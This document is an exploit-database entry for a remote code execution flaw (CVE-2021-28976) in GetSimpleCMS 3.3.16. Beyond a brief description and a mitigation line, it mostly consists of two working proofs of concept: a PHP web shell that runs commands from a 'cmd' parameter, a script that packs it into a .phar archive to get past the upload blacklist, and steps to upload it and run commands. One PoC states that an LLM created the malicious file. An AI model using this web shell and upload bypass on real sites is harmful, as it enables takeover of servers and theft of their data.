GetSimpleCMS 3.3.16 - Remote Code Execution (RCE)

vendor:

GetSimpleCMS

by:

CodeSecLab

6.1

CVSS

HIGH

Remote Code Execution (RCE)

CWE

Product Name: GetSimpleCMS

Affected Version From: 3.3.16

Affected Version To: 3.3.16

Patch Exists: YES

Related CWE: CVE-2021-28976

CPE: a:getsimplecms:getsimplecms:3.3.16

Metasploit:

Other Scripts:

Platforms Tested: Ubuntu, Windows

2024

GetSimpleCMS 3.3.16 – Remote Code Execution (RCE)

An attacker can exploit GetSimpleCMS version 3.3.16 by creating a malicious .phar file that contains a PHP script allowing the execution of arbitrary commands. By uploading this file through a vulnerable upload functionality, the attacker can trigger the execution of the injected code remotely, leading to a remote code execution vulnerability. This vulnerability is identified as CVE-2021-28976.

Mitigation:

To mitigate this vulnerability, it is recommended to update GetSimpleCMS to a patched version that includes specific filtering for 'phar' file types in the blacklists used for validation mechanisms.

Source

Exploit-DB raw data:

# Exploit Title: GetSimpleCMS 3.3.16 - Remote Code Execution (RCE)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/GetSimpleCMS/GetSimpleCMS
# Software Link: https://github.com/GetSimpleCMS/GetSimpleCMS
# Version: 3.3.16
# Tested on: Ubuntu Windows
# CVE : CVE-2021-28976

PoC-1:
1)Create a .phar file.
1. Create the PHP script: Save your code (the one you provided) in a file, say index.php: <?php echo shell_exec($_GET['cmd']); ?>
2. Write a PHP script to create the .phar file: Use the Phar class in PHP to package the index.php file into a .phar archive. Create a script named create_phar.php as follows:
<?php
try {
    // Initialize a new Phar object, name it "archive.phar"
    $phar = new Phar('archive.phar');

    // Set the stub (entry point) for the Phar file, pointing to index.php
    $phar->startBuffering();
    $phar->addFromString('index.php', file_get_contents('index.php'));
    $phar->setStub($phar->createDefaultStub('index.php'));
    $phar->stopBuffering();

    echo "Phar archive created successfully!";
} catch (Exception $e) {
    echo "Error: " . $e->getMessage();
}
3. Run the script to generate the .phar file: On your terminal (assuming you're using a system that has PHP installed), run the following command to execute the script: php create_phar.php. 
After running the script, you should find a file named archive.phar in your working directory.

2)Upload file:
1. Upload the 'archive.phar' file using the vulnerable upload functionality at http://getsimplecms/admin/upload.php. 
2. You can find the file at http://getsimplecms/data/uploads/.

3)Details:
 "Validation Mechanisms Before Patch": "File extension blacklist and MIME type blacklist were used but lacked specific filtering for 'phar' file types.",
    "Bypass Technique": "Upload a 'phar' file, as it was not included in the original blacklist, which can be treated as a PHP archive by the server for remote code execution.",
    "Request URL": "http://getsimplecms/admin/upload.php",
    "Request Method": "POST",
    "Request Parameters": {
        "file": "<Malicious File>"
    },


PoC-2:
1) LLM creates the file exploit.phar with the following contents:
malicious.php                                                                                       0000644 0000000 0000000 00000000036 00000000000 010442  0                                                                                                    ustar 00                                                                                                                                                                                                                                                       <?php system($_GET['cmd']); ?>                  

2)
1. Prepare a PHP file named 'exploit.phar' .\n
2. Send a POST request to http://getsimplecms/admin/upload.php with the 'exploit.phar' file as the 'file' parameter.\n
3. Access the uploaded file at http://getsimplecms/data/uploads/exploit.phar and execute commands by passing the 'cmd' parameter (e.g., http://getsimplecms/data/uploads/exploit.phar?cmd=id).

[Replace Your Domain Name]